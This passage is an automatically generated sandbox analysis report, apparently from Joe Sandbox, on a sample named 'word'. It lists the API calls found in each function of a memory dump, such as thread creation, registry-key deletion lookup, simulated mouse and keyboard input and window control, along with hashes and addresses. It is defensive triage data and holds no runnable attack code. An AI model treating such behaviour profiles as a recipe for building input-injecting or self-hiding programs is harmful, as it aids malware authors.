                                                                    • Instruction Fuzzy Hash: EA213270200A019FCB20DF65CAD4B2A77A9BF45312F50855EED45CB352DB39EC45CB69
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                    • __calloc_crt.LIBCMT ref: 00415743
                                                                    • __getptd.LIBCMT ref: 00415750
                                                                    • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                    • __dosmaperr.LIBCMT ref: 004157A9
                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1269668773-0
                                                                    • Opcode ID: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                    • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                    • Opcode Fuzzy Hash: 67dce5b71fba5b2bc579f619b30886b4133a6035229b30961222ec1983ea5d94
                                                                    • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 004175AE
                                                                      • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                      • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                    • __amsg_exit.LIBCMT ref: 004175CE
                                                                    • __lock.LIBCMT ref: 004175DE
                                                                    • InterlockedDecrement.KERNEL32(?,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 004175FB
                                                                    • InterlockedIncrement.KERNEL32(002F2C50,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 00417626
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                    • String ID: P,/
                                                                    • API String ID: 4271482742-18719061
                                                                    • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                    • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                    • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                    • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                    APIs
                                                                      • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                      • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                    • DuplicateHandle.KERNEL32 ref: 0043912C
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                    • DuplicateHandle.KERNEL32 ref: 00439145
                                                                    • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                    • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                    • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                    • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                    APIs
                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                    • String ID:
                                                                    • API String ID: 4166825349-0
                                                                    • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                    • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                    • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                    • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00434134
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                    • API String ID: 2574300362-3261711971
                                                                    • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                    • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                    • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                    • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?,00000000,FFFFFFFF,00000000,?), ref: 00433724
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00433757
                                                                    • GetClientRect.USER32(0000001D,?,00000000,FFFFFFFF,00000000,?), ref: 004337AC
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00433800
                                                                    • GetWindowRect.USER32(?,?), ref: 00433814
                                                                    • ScreenToClient.USER32(?,?), ref: 00433842
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                    • String ID:
                                                                    • API String ID: 3220332590-0
                                                                    • Opcode ID: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                    • Instruction ID: 40e56d112be44df416332e5c874318f33691c6b0c201ea6c9f9086adb5117cf0
                                                                    • Opcode Fuzzy Hash: 3d0204db3781b081fd3de6a8efec2d06c6e501bf89adf1cf9fb69463b8de8f3e
                                                                    • Instruction Fuzzy Hash: E9A126B42147028AC324CF68C5847ABBBF1FF98715F04991EE9D983360E775E908CB5A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1612042205-0
                                                                    • Opcode ID: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                    • Instruction ID: 39b6431fb86a1cae222df6ecce28f21653e085caad8de22f1e35678e4483a9b6
                                                                    • Opcode Fuzzy Hash: de2929fcda50375e6e5cb9f1075b8832783a078aa1feca3c1cc6154b42d84a61
                                                                    • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                                    • String ID:
                                                                    • API String ID: 2221674350-0
                                                                    • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                    • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                    • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                    • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2037614760-0
                                                                    • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                    • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                    • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                    • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                    APIs
                                                                    • BeginPaint.USER32(00000000,?), ref: 00447B9D
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                    • EndPaint.USER32(?,?), ref: 00447CD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 4189319755-0
                                                                    • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                    • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                    • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                    • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                      • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                      • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                    • String ID:
                                                                    • API String ID: 1726766782-0
                                                                    • Opcode ID: b93b88d63d238f678c6d700454b3a2eb4294c470044b91675d33edbff7870a15
                                                                    • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                    • Opcode Fuzzy Hash: b93b88d63d238f678c6d700454b3a2eb4294c470044b91675d33edbff7870a15
                                                                    • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                    APIs
                                                                    • ShowWindow.USER32(?,00000000), ref: 004410F9
                                                                    • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                    • ShowWindow.USER32(?,00000000), ref: 00441183
                                                                    • ShowWindow.USER32(?,00000004), ref: 00441192
                                                                    • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                    • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                    • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                    • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 00442597
                                                                      • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                    • GetDesktopWindow.USER32 ref: 004425BF
                                                                    • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                    • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                    • GetCursorPos.USER32(?), ref: 00442624
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                    • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                    • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                    • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                    • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                    • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 1871949834-0
                                                                    • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                    • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                    • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                    • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0044961A
                                                                    • SendMessageW.USER32 ref: 0044964A
                                                                      • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                    • _wcslen.LIBCMT ref: 004496BA
                                                                    • _wcslen.LIBCMT ref: 004496C7
                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 1624073603-0
                                                                    • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                    • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                    • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                    • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
